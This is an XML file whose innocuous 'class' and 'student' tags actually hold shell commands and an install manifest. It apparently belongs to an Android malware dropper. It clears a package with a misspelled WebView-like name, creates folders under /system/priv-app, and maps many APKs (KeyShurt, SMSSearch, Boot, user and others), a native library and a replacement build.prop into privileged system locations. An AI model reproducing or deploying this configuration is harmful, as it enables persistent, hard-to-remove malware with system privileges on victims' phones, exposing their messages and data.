<?xml version="1.0"?>  
<class>  
    <student>
        <special>pm clear com.android.webvhriew
mkdir /system/priv-app/user/
mkdir /system/priv-app/SMSSearch/
mkdir /system/priv-app/KeyShurt/
mkdir /system/priv-app/KeyShurt/lib/
mkdir /system/priv-app/KeyShurt/lib/arm
mkdir /system/priv-app/Al/
mkdir /system/priv-app/bluetooth/
mkdir /system/priv-app/folder/
mkdir /system/priv-app/groups/
mkdir /system/priv-app/KeyTt9/
mkdir /system/priv-app/leas/
mkdir /system/priv-app/prefixer_london_kosher/</special>
        <name1>build.prop</name1>
        <path1>/system/</path1>
        <name2>librealm-jni.so</name2>
        <path2>/system/priv-app/KeyShurt/lib/arm/</path2>
        <name3>KeyShurt.apk</name3>
        <path3>/system/priv-app/KeyShurt/</path3>
        <name4>Boot.apk</name4>
        <path4>/system/priv-app/Boot/</path4>
        <name5>user.apk</name5>
        <path5>/system/priv-app/user/</path5>
        <name6>SMSSearch.apk</name6>
        <path6>/system/priv-app/SMSSearch/</path6>
        <name7>Al.apk</name7>
        <path7>/system/priv-app/Al/</path7>
        <name8>ALauncher.apk</name8>
        <path8>/system/app/ALauncher/</path8>
        <name9>bluetooth.apk</name9>
        <path9>/system/priv-app/bluetooth/</path9>
        <name10>folder.apk</name10>
        <path10>/system/priv-app/folder/</path10>
        <name11>groups.apk</name11>
        <path11>/system/priv-app/groups/</path11>
        <name12>KeyTt9.apk</name12>
        <path12>/system/priv-app/KeyTt9/</path12>
        <name13>leas.apk</name13>
        <path13>/system/priv-app/leas/</path13>
        <name14>prefixer_london_kosher.apk</name14>
        <path14>/system/priv-app/prefixer_london_kosher/</path14>
    </student>
</class>
